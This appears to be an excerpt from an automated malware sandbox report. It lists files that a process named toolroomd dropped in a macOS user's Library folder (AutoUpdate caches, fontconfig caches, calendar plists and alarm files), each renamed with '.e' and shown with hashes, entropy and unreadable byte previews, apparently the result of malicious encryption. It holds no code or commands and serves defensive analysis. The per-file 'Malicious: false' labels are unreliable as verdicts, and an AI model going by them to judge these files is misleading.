MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/com.microsoft.autoupdate.fba/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53589
Entropy (8bit):	4.1983200030239365
Encrypted:	false
SSDEEP:	96:8RujDL/oLGm11B4hBF8LfiW6cJjs6SOmaGnGJv4X7EhxvQWNDkohVRDu:PLoCy1ihBUqbce69DGnGJv4X7axXu/
MD5:	92A1725573E7E0A603F4F27419FEEF8C
SHA1:	8D324DDA28F4AE5CF7F506AE42691B9D75F88F8E
SHA-256:	2EB50D72C7D27C0CF5EB4FFF673496352AB4459A69D7F4B07B6E9830EC3FC5EB
SHA-512:	EFEC4048AE5E6AC9DF06710021563496D5871C8BEC718D6A0424117B9635E7CF6AEE8E1B3889930A517AF7FF08D7BF20772BBE4ECF30DEA9274E4FDBB884BD04
Malicious:	false
Preview:	..d.=..._t.........X...vi..b..6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a...2.I6.1..P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.microsoft.autoupdate2/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.395691629738555
Encrypted:	false
SSDEEP:	24:+t3roQoQoQoQou00000000N000000000000000000000000000000N0000000001:+tctENpq
MD5:	6E9076EA57DAA6AC4D392EAB241B4554
SHA1:	DD16184D8794946B67EA4A95B67EE8CEAC7B8AA4
SHA-256:	4AE21B7DE9A84E12872C72077EBF13BB1D01E80F9A416F4FCC87D117C41FD7B3
SHA-512:	74D8E0147FB85FB163589A23FFCF67520C2906071F6ED679A2269FDD7309F05DA64D0120481A128BB756C052542108F075A30A444C04AA4CB65A22A50356696F
Malicious:	false
Preview:	f...#D.......pUa^.......UC..\|...2j...[...7&..f...#D.......pUa^.......3;.&..<...2j...[...7&..5.O.....M..Q).....q.A"&6<.."a..5.O....'.IT1..vq;`y.'o1..!....'.IT1..vq;`y.'o1..!....'.IT1..vq;`y.'o1..!....'.IT1..vq;`y.'o1..!....'.IT1..vq;`y.'o1..!...6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.microsoft.autoupdate2/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/com.microsoft.autoupdate2/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53589
Entropy (8bit):	4.169117446713231
Encrypted:	false
SSDEEP:	96:8RujDL/oLGm11B4hBF8LPorWaKBJDuX1BjUxhbm/Iafjhq179/zgK5V0dDu:PLoCy1ihBUPOGJA1JeUXfNmp/ztb
MD5:	622980DE61E39BC3237E259F0A2C1765
SHA1:	C2A60E04998CAB404C4451E5FCF100A8BC268F2D
SHA-256:	C14078B2D1903C0A108584A79A3AB50A45634EB728619391345ED199AD0607DD
SHA-512:	A79EE1A12804CD3D185B5B598EB53E54A7B9B51E2EEC9BBDC54161B160FCD270EBEC40CDB0C002D3E0C4A340931B5DC9D8E16233F37A54DFE462C64FBBF191C5
Malicious:	false
Preview:	..d.=..._t.........X...vi..b..6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a...2.I6.1..P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.xamarin.fontconfig/.84c0f976e30e948e99073af70f4ae876-le32d4.cache-3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	436292
Entropy (8bit):	7.245377957527157
Encrypted:	false
SSDEEP:	12288:vLDoD4ii6Q9H6kqnQ8KNyMSy+lt8UzN3tNeGdNbEIlaRoYSBMoU5DBi/oh0JDgLP:fC/Qp6kqnQat8Uin/
MD5:	C0FE345621879459A12D4749D47CFE0C
SHA1:	C8729E39CB0155AFE1384F9039E2AC0D4E38C5E8
SHA-256:	88A659025F92F3C391F2B956C317693924AAAE5A047789CCA539EEC57DA9B908
SHA-512:	393254A944B4EA43015F2DABDCE988704DD2A3124CEA6F1C90E80180BAB2B1339D49A8E1C9AA2FE7C32535EA8E2B343ED19861E295130F1A8569DA0FC96BE8B9
Malicious:	false
Preview:	l[....m..._.....W..;.B_.F...0B.E......^3....EW.<.n.mF.o.j..%...]4...Yu..P V..1J.9..$].g.]Rgi.....7K.9E.^"..e.1..S.EH..3.C..A..<_....A..S......_..9..%....Ns%...?.l...._>..e.N5q...[d.....O4 .@.>.1`.Q....U..2,....a..... 4dp....+..):.....I.H......\'.U"6.FjTY.}..E;..C.U..........r.K.e:.7.T&.$O.J.4..R...Q.a..M..x.[....)U....p..(<.....VX`.A.h...?.y.Y7.y..~.-!E&...=.~..7m ..b.@k.n...~J...,e..Y_]Sg.yn.k0.r5D>)...n.I..B...r.Y.....9.......\|.w..6b......h..D.nP</.Go.#....+....A....h......r...E.H...+Pv...:.hbi.....;..rH...f...N....'...1..... .Sk...r\.B.J.....Ji1R......u..r..4VKd+.. ....vq%.Th....A.H>GWL...`{p....-N......Bt\|..q.*.f...h]0k.V....F}.8Q...\.b7Uf?....y..._XhN.(.%D...w.[.....FwO...).\....s..f..@5..@`.H...y.'.<.,h.4.9P.wN...v...y......C..YON....D.OKx;.....%kNb.H...A~=}...3.o~k.\|.!.k2...h...u2.f.1..9.\|....m.,.v.7.....z.....M#.8..p.R$.(Z4`..9.....v..8..}......t(.>.....UVG5-.0..i....\|....../%Jn.j.G#..c}.m...4......e..GM...32!n....$.9..>...P..

/Users/berri/Library/Caches/com.xamarin.fontconfig/.b0a71e6bf6a8a1a908413a823d76e21f-le32d4.cache-3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	477223
Entropy (8bit):	7.361242621326877
Encrypted:	false
SSDEEP:	6144:3dbHuwGhTJKsAry0+kP5kzzZNtC08N7UxpnhG9pwdjJn:3djGhTwsAGW5kzzZNdxEMV
MD5:	915F9A034A4C76D4647B3BF7071783FF
SHA1:	73ABE6D2CC75487A4987A8AC0258A8F60B62F02B
SHA-256:	2034C81C834F1A05B55CF738B7F4EE189DDD382B19901CCDDBBAF558B26DA5EC
SHA-512:	7BA6CF567B7CBCF4F904D5F92F9F5B9E12A9F11A6821AD94FD45BED4361D30A0FEE3A142AAE006EDD5FFB959E02E08541766C20F8D96FA2EAAB00BA5C3968B40
Malicious:	false
Preview:	l[....m..S[....)..i.$.yR....4).~.j..B..);.....U..B.......o.j..%..[.@.X\G....v1.._.]cv....Y....%RVH.t....:..1.....c...x..p.=5\.....tH^O.^.......Y.P<.........=.>7K$.{...,..x.g.mP[=..vO..t.].@...s...T.....a.....i.r.s.....6..6.r....g.$..1@..^sR;...U.'..A.6....<.E.#.A@j.G.x.......Rs.J..9..T..3.OOb.e..0.).. [....f.Ci..}.X$.....v...+.}#......@.R...p.j....l...\|..4.\5.W\........D....6...bSv.<d.!T.X.....tM..."\5."M.j.Q...n..:.'.].......\....b..:M..w.klp.70..*..........;....X.^j.......[b.7.d..Ek.w...>..j\ZiA.@\o..n.....T....,..C..q=<r.EB..{.E$T6uN.......Mf.. .k.3...lm.D......._..d.qP.....1...I...sm.n.O..n.O...k...N....T.H..,.HM{..k.../@Irsg:..rl@...W..\|P...E...(i%...o.k?....i.p...A.W"..B...g..f/%.../pL.....r.G.....k.KJ.[...t&O.j...p...2.P.%..'..k.)..\M. .E......W..2.S.(.r.d..j.\|.aEe.WV'xF....P....g.....#.eSr.....d.....VD[%..c....^A....:_;K.......Q>.(.o...............-..u.[....\|.(....].\|.;.u`.0.ft..(.7"-..A=#....-TP.A.B1.m_z...R..w..

/Users/berri/Library/Calendars/55551039-1526-493E-94BA-D7174A081E6E.calendar/.Info.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1010
Entropy (8bit):	7.159362397628153
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9aqEhTHho6EpE3J0IoWz/BHsePc0m7:yjzHEhrhownHNpq
MD5:	6E5773B27DFC71135DA627C646A48F8D
SHA1:	B91BB8D60CE6A155B36C3C1E54D8AFFEF71E4395
SHA-256:	A11E90C93CECD7E8EE125DA90495127FD7B501442F45612F6B6B3953BD24F0BD
SHA-512:	60F6F72757FD269130EB2D063F73329FD7028ED8865700CFB2E1F36F60FA0CBE76CE9EEA6A9F5ED6D8D451DEE2FB58C7DB8E4D61131A3A7BFCA7B7D4255DE898
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C........9[...II{.Y....tK./)\0..ptf...f.~!+.X.\|0.#.,.....r..`..Uu..)..(.oL(.....,.@3g.B.e..../..V...Dc.7zO.>..s432....S...G.....UL"....m..o....T.2.(!M...W.@.'......U.n),...U.....8;..3._..{.Z...pL.M]..f.....Q..TS[.b.tEF..u..L.....G..7.;...s432.Q.:?u...O.H.....v.7.x..D....=v..~...91A....'4...U.n),........#..]=h.Q.J\......[%..3=./...9.C..8.K...>..z3..N...B..g=....].~..>3.W.@.'......U.n),.f.......(.oL(..D5yS...g.B.e...yy.2ozeN.:.L..y...s432....j.....M..m.".pL.M]..Hs..N.....{.....\.?......G..0[.....f&...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................................................

/Users/berri/Library/Calendars/55551039-1526-493E-94BA-D7174A081E6E.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.276649039429095
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/ExvSFI9a59IL4UoiyKmYsewLYTc+qGm7:uicldhYzKe9o4U/PmYsePc0m7
MD5:	58EAB3280E507BC74F46A197C7AE2ABD
SHA1:	A6220456A2C0B03AFED38DA22C3F2CF912FA7494
SHA-256:	F49641046978AECE8DFE449D7818D211DEA9F1509CF68CE00FC0BCAD7BDB39EA
SHA-512:	02E3787277BCB3A7CD43C9C9397DE3BDDBB5145E998A38AEB8B70A901F271A5D18D3D317F8DAB0FF737D9D08030E1F63470EDAFB49339DEC9C1700D80B75A537
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c........MSe.I,'6$'.'W[W.o.T...:v...J.X.N.5..`....`.I.1%.l...GU.6.&..G..[.D.l..kwv..%_.$^T\|........4!i.m..`...A:..t...u.P..........WV.....J7....A[]HJ~..7.&.2../...\^\.!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/55551039-1526-493E-94BA-D7174A081E6E.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.287101620733969
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/E/HpCo4gNKriAEAsewLYTc+qGm7:uicldhY4JCo4IKiNAsePc0m7
MD5:	6BE2CC481D468908BF0B00DBBB43A730
SHA1:	8FB41360284F06FFD3C60DA27D4A0A3294264AC1
SHA-256:	2FCBF5ED33AAA362BFF448B9A6158484F20741E0FFE56C6CC50EAC9DEAD5430E
SHA-512:	A216BAB94280D8BF4A7AD884AEAC76B4B500A06BC59077272B75910137EB21D804D92C8A12EE6904BFCDF0F59673303F197D020D6F9AB447B0AA6389F62A59A1
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c....ixD....e...h.if6/6WIBu.....#......z..f...1zx.u12Hh..D))..P...Y.ftR..g..g.&8.%_.$^T\|..<...............h...W_.I^3.mL..j6.?.. ...!)B....X.uz.. .C..u$..]1XX .e!w..!.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/55B84E7C-0E66-4F49-A679-F7EF35486EBA.calendar/.Info.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	7.218289789197917
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9aqE9THhoTNGNq/lOaC+cP6i6usePc0m7:yjzHEthoTNGNq/0aC+cPP9Npq
MD5:	6729E18C0D7439D230885367328A6515
SHA1:	02F960E2767A6A5D62DEE5B2A3293EA2FD2DFE82
SHA-256:	9C76F0845410A49F558BE7AA0943B12CCE9CC95E9D7E3B82FC59192760A34E38
SHA-512:	91C272CB8810F59852E462DBA5B543EC35F1110E74D897645E78D0562AA72C4287BFA5A0CE954A24A0EFE9FB1A0E48F20607CE4D0F875AB421DDB0F69B3CCF02
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C........9[...II{.Y....tK./)\0..ptf...f.~!+.X.\|0.#.,.....r..`..Uu..)..(.oL(.....,.@3g.B.e....M)...%..M&u'.....s432....S...G.....UL"....m..o....T.2.(!M...W.@.'......U.n),...U.......FHu...i..~E.v...7.mR.l<r..4....2D:....5.@.N....L..?.D.$.f..73.s.h.Z..].>.c..@..q...u.J..^..N...B..g=....".VB/..;.Y....tK.1./.....-v.U..}..atk&R...\....c.[.^.)[].4H...c.e!y.y.....j..._U..i..[....W...p...$.sB....2.I8........Bh.>.\|`..U.....,....i-.1.v...G4;.Z.Yl..#S..D..O.x...N._U..i..X._...3...!...LzO........y.\|.![.....%........H..(.oL(..>..oN%F..y.\|.![....u._.3,Vz.k..._..s.....$.w3.5......9...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................

/Users/berri/Library/Calendars/55B84E7C-0E66-4F49-A679-F7EF35486EBA.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.344379268052371
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/EC1RAfSORSlGPoiyKmtQsewLYTc+qGm7:uicldhYHRAf5S0P/PmSsePc0m7
MD5:	5E7E7503F61DCD801F7E5448E6DB8E8D
SHA1:	46932554810AC9CB713E776214F99FEFDE397AC9
SHA-256:	566D5A989D3438517207BF165FCE5CE5858DFADAAA8AD7E3D6AEBDEF77984F50
SHA-512:	E9958E72E119CD77B043AC9B14369EE525DE787355EA4A7847390E91436284B4A8999D1ED6FFD5C95D2466179056103CBAB6406F858ED685F9942889AE74BC91
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c.......LI.....p..x.A...........A3.;..3JH5......K.a..........i..N0n.z..{Y.....%_.$^T\|........4!i.m..`...A:..t...u.P..........WV.....J7....A[]HJ~..7.&.2.,...{7..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/55B84E7C-0E66-4F49-A679-F7EF35486EBA.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.32572467866744
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/EPV+ALvQmNKriAEAsewLYTc+qGm7:uicldhYQV+AcyKiNAsePc0m7
MD5:	3CA81EBB8BD070F8C14A088C078BE2A8
SHA1:	A41E93F249DCCA1B7E9D949B83E6C01A28DA6ED6
SHA-256:	4BD19549216F9265142E524F1F1D22E86C0C0D4F20C4B18F0E7D240B86456320
SHA-512:	AD5FE65685FD5C862A0A05F485D17D591FF6320CBFCC12657B7FC52CDE7B9A3D20A8C214C2AEE057308E2250B4D5561C1E3EBB971FE9F4A78D9D51E219D30E61
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c.....k.....K.{M3..<9.'..+.Y.;....S....V./....M..#.H..w...f8.f....F].Z..w..u...%_.$^T\|..<...............h...W_.I^3.mL..j6.?.. ...!)B....X.uz.. .C..u$..]1XX .e!w..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/830E24F7-620D-4662-93D1-BCCC155BA6F2.calendar/.Info.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	7.216521850152463
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9aqE9THm5MemMcjCImzPomoGcwglOsePc0m7:yjzHEtmMemPjAomWwgONpq
MD5:	2E54EBDE12EADF27A21AA64E8713F9B8
SHA1:	23EDE5E03504AD0FCFFAADECC293789B299315AE
SHA-256:	AEED626BD38420743DA1AE656A5AD6E35F30CCC88B3082B92A0E6326B1820F33
SHA-512:	8DDCD66FB2477EA0F398A6876E2F5D4B0D83A5DF3CA9A67E113ABA44B672FD0D452E7B25F02AC23B1AF7172977FAC0E51585C9A9A8686D4AAB25C0C9C52D57F7
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C........9[...II{.Y....tK./)\0..ptf...f.~!+.X.\|0.#.,.....r..`..Uu..)..(.oL(.....,.@3g.B.e....M)...%..M&u'.....s432....S...G.....UL"....m..o....T.2.(!M...W.@.'......U.n),....-....(.oL(....j.F...g.$.......I..k..3....zI...I='P.Y....tK./)\0..p..l@.g[.R.l<r..4....2D:....5.@.N....L..?.D.$.f.r......._U..i...<.q..(..R4....GMf.,..=........<..G[....XF.VG...~...91A....'4...U.n),..........x/...Q.J\...<......3=./...9.C..8.K...>..z3..N...B..g=....].~..>3.W.@.'......U.n),...U.....!...LzO........y.\|.![......../..>U...._.{.._B....)..CO'H+......2..}.Ol....s432.y...-.m+.r....k...T.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................

/Users/berri/Library/Calendars/830E24F7-620D-4662-93D1-BCCC155BA6F2.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.3506080440733745
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/E8tW4ibO7X1toiyKmtQsewLYTc+qGm7:uicldhYPibM1t/PmSsePc0m7
MD5:	ACE6A432854FCCD27D3FD4451E0D1A22
SHA1:	DF745D32B7FF4D7FA936302BE4D8BE0F1C55A3EA
SHA-256:	6FDF6C1A40A457FF588ACD6AC750049CB25BDE527A7E91A84D8EB821C74CBC31
SHA-512:	8FF735459A46171BFC3E971924444F930E66D5F82C7B6FEB9160EC4741A2CE391A607C132CEDDC9693B3D29245760C30C2A1372AC0BA50294EBA678115303800
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c.....e..y....6=...\.U(..4l<..d...P...~.B.W...&...6.3..0.G).g.....{...T.....Vx(.u...%_.$^T\|........4!i.m..`...A:..t...u.P..........WV.....J7....A[]HJ~..7.&.2.,...{7..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/830E24F7-620D-4662-93D1-BCCC155BA6F2.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.321782859828554
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/EWQ0LLByx5mrafNKriAEAsewLYTc+qGm7:uicldhYfLKmra1KiNAsePc0m7
MD5:	F4CD79EBFA4DEAA9A92949877777ECC8
SHA1:	C82AC03523FF0EB937ED0D1B764719EAF5BAA814
SHA-256:	A39CCDF67081C1701B7294F9FEDABFD83FAD9D4CE89B3B78B96A69C5EA91A708
SHA-512:	CFED334D16EB4D5AF75603176CCD329A94A0D73657F9F9A2837759A3F4C48A73529D64E85CC06FC7E89A50C3C41B3FCB6C6D6537A0C938AFBCD3DFE5067040A3
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c....m.......]...me:j.nE..Y.m.(J}..&K...;.....U.kA8X.d.(.f(.o...^.lw@.T.....v..V...%_.$^T\|..<...............h...W_.I^3.mL..j6.?.. ...!)B....X.uz.. .C..u$..]1XX .e!w..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/885D75D5-6C5B-4D32-A412-444F6D271C8A.calendar/.Info.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.249690906646951
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9aqEaqHhoTNGAEwmgRIhT8xcw6sePc0m7:yjzHEakhoTNGofRwT86w6Npq
MD5:	0896A6BF0BEA3B006F30032D58FAC939
SHA1:	21DF394FF4B6EBB568686B7A5DB2799D7068DFEF
SHA-256:	D68C8D552F54CA4C7F31C011FE400CC34EAB7DCCCC8B5DAC4BF4EF222B3F2FBD
SHA-512:	DAFE6F5ABBA2AD2E14B54265123835992CCAEFCC4C19B29BE5EC81AE8FB927DD25D062CD363BEB3AFBD7924DE5C70B64DDF2134BA58E6CB8FD31ACD7DDF679EE
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C........9[...II{.Y....tK./)\0..ptf...f.~!+.X.\|0.#.,.....r..`..Uu..)..(.oL(.....,.@3g.B.e....."....WB8t..M...s432....S...G.....UL"....m..o....T.2.(!M...W.@.'......U.n),...U.......FHu...i..~E.v...7.mR.l<r..4....2D:....5.@.N....L..?.D.$.f..73.s.h.Z..].>.c..@..q...u.J..^L"....m..o....T..8.....Q\|.I.+8.....{..3.........{b.....N.._Y..h..FS. 